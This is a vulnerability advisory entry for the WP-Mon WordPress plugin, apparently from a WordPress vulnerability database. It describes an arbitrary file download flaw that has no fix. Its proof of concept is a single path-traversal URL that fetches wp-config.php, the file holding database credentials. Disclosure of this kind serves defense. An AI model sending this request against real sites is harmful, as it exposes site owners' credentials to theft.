WP-Mon - Arbitrary File Download



Proof of Concept
As seen in access logs:
http://www.example.com/wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=../../../../&name=wp-config.php

Affects Plugin

no known fix
- plugin closed

References

PacketStorm 131502

Classification

Type RFI
OWASP Top 10 A1: Injection
CWE CWE-98

Miscellaneous

Submitter pvdl
Views 6673
Verified No
WPVDB ID 7911

Timeline

Publicly Published 2015-04-16 (about 5 years ago)
Added 2015-04-20 (about 5 years ago)
Last Updated 2019-10-21 (9 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin